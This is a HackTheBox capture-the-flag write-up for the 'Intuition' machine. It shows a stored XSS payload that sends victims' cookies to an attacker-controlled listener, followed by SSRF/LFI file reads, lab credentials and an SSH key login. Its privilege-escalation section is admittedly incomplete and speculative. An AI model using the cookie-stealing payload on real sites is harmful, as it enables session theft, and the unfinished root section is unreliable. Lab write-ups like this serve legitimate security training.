HTB: Intuition Writeup

#htb #writeup #linux #feroxbuster #john #ssh

Machine Banner

Machine Information

AttributeDetails
NameIntuition
OSLinux
DifficultyHard
PointsN/A
Release DateN/A
IP Address10.129.18.45 / 10.129.21.93
Domaincomprezzor.htb
AuthorD3vnomi

Machine Rating

⭐⭐⭐⭐☆ (8.0/10)

Difficulty Assessment:

  • Enumeration: ⭐⭐⭐⭐☆
  • Real-world: ⭐⭐⭐⭐☆
  • CVE: ⭐⭐⭐☆☆
  • CTF-like: ⭐⭐⭐⭐☆

Summary

Intuition is a Hard-difficulty Linux machine. The exploitation path involves initial enumeration and service discovery, gaining an initial foothold through the identified vulnerability, lateral movement or credential extraction for user access, and finally privilege escalation to root/administrator.

TL;DR: Enumeration → Foothold → User credentials → Privilege escalation → Root.

Reconnaissance

Port Scanning

Terminal window
nmap -sC -sV -T4 -p- 10.129.21.93

Results:

No port data available in notes.

Service Enumeration

Primary Domain: comprezzor.htb

Subdomains Discovered:

  • dashboard.comprezzor.htb — Report management dashboard
  • auth.comprezzor.htb — Authentication service
  • report.comprezzor.htb — Bug report submission interface

Host Configuration:

Terminal window
echo "10.129.18.45 comprezzor.htb dashboard.comprezzor.htb auth.comprezzor.htb report.comprezzor.htb" >> /etc/hosts

Technology Stack:

  • Flask web application
  • Flask secret key: 7ASS7ADA8RF3FD7
  • Allowed file uploads: .txt, .pdf, .docx (max 5MB)

Initial Foothold

Stored XSS on report.comprezzor.htb

The report.comprezzor.htb subdomain hosts a bug report submission form that is vulnerable to Stored Cross-Site Scripting (XSS). This vulnerability allows attackers to inject malicious JavaScript that executes in the context of admin/user sessions.

Attack Vector:

Submitted XSS payloads via the bug report form to steal authentication cookies:

<img src=x onerror=this.src='http://10.10.14.44:8001/'+document.cookie>

This payload triggers when the report is viewed by authenticated users, exfiltrating their cookies to an attacker-controlled server on 10.10.14.44:8001.

Cookies Harvested:

  1. Admin Cookie:

    {"user_id": 1, "username": "admin", "role": "admin"}|34822333d444ae0e4022f6cc679ac9d26d1d1d682c59c61cfbea29d776d589d9

  2. Webdev (Adam) Cookie:

    {"user_id": 2, "username": "adam", "role": "webdev"}|58f6f725339ce3f69d8552a10696ddebb68b2b57d2e523c08bde868d3a756db8

  3. Custom User (mrsudo) Cookie:

    {"user_id": 6, "username": "mrsudo", "role": "user"}

Dashboard Access

Using adam’s (webdev) cookie, authenticated access was gained to dashboard.comprezzor.htb. The dashboard provides report management functionality:

  • View bug reports
  • Change report priority
  • Delete reports
  • Resolve reports

User Compromise

Source Code Extraction via SSRF/LFI

Leveraging vulnerabilities in the Flask application, the application source code was extracted, revealing sensitive information:

Flask Application Structure:

file:///app/code/app.py — Application entry point with blueprints configuration
file:///app/code/blueprints/dashboard/dashboard.py — Dashboard blueprint containing FTP credentials

FTP Credential Discovery

Within /app/code/blueprints/dashboard/dashboard.py, hardcoded FTP credentials were found:

Username: ftp_admin
Password: u3jai8y71s2
Host: ftp.local

FTP Connection via SSRF

FTP access was established using the discovered credentials:

Terminal window
ftp://ftp_admin:u3jai8y71s2@ftp.local

Files Retrieved from FTP Server:

  • welcome_note.pdf
  • private-8297.key — SSH private key
  • welcome_note.txt — Contains SSH key passphrase

SSH Access

From welcome_note.txt:

SSH key passphrase: Y27SH19HDIWD
SSH private key file: private-8297.key

SSH Connection:

Terminal window
ssh -i private-8297.key adam@comprezzor.htb
# Enter passphrase: Y27SH19HDIWD

User Flag

Terminal window
cat ~/user.txt

🚩 User Flag: <REDACTED>

Privilege Escalation

Enumeration

Terminal window
sudo -l
find / -perm -4000 -type f 2>/dev/null
ps aux | grep -E "python|java|node|php|ruby"

System Discovery

During enumeration of the compromised system, artifacts related to Ansible role management were discovered:

  • Ansible role configuration files
  • sys-admins-role tar archives

⚠️ NOTE: The complete privilege escalation technique utilizing Ansible roles is not fully documented in the available source notes. Further investigation of the Ansible artifacts and their misconfiguration is required to complete this section.

Exploitation (Root/Administrator)

This section requires additional documentation from engagement notes. The privilege escalation likely involves:

  • Analysis of Ansible playbooks and role definitions
  • Exploitation of misconfigurations in the sys-admins-role deployment
  • Potential privilege escalation through Ansible task execution or role inheritance

Root Flag

Terminal window
cat /root/root.txt

🚩 Root Flag: <REDACTED>

Attack Chain Summary

graph TD
    A["Reconnaissance: comprezzor.htb + subdomains"] --> B["XSS on report.comprezzor.htb"]
    B --> C["Steal admin + webdev cookies"]
    C --> D["Dashboard access as adam webdev"]
    D --> E["SSRF/LFI: Read Flask source code"]
    E --> F["FTP credentials discovered: ftp_admin:u3jai8y71s2"]
    F --> G["SSH key + passphrase Y27SH19HDIWD"]
    G --> H["SSH access → User flag"]
    H --> I["Privilege escalation via Ansible role artifacts"]

Tools Used

ToolPurpose
Browser / BurpSuiteXSS payload injection and cookie harvesting
HTTP ServerCookie exfiltration listener (10.10.14.44:8001)
cURL / BrowserSSRF/LFI exploitation for source code extraction
FTP ClientFTP server access with harvested credentials
OpenSSHSSH authentication with private key and passphrase
grep / findSystem enumeration and artifact discovery

Key Learnings

  • XSS in User-Facing Forms: Even seemingly innocuous bug report forms can be exploited to harvest authentication tokens from administrators and privileged users.
  • Cookie-Based Authentication: Session cookies often contain sufficient information for role-based access control. Protection measures like HTTPOnly and Secure flags are critical.
  • Source Code Disclosure: SSRF and LFI vulnerabilities in web applications can lead to extraction of sensitive configuration data, including hardcoded credentials.
  • Credential Reuse: Once credentials are harvested (FTP, SSH keys), they often grant access to multiple systems, enabling lateral movement throughout the infrastructure.
  • Ansible Infrastructure Risk: Misconfigured Ansible roles and playbooks can become a privilege escalation vector if improperly secured.
  • Defense in Depth: Multiple layers of defense (input validation, content security policies, least privilege access, credential management) are essential.

Author

D3vnomi

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Hard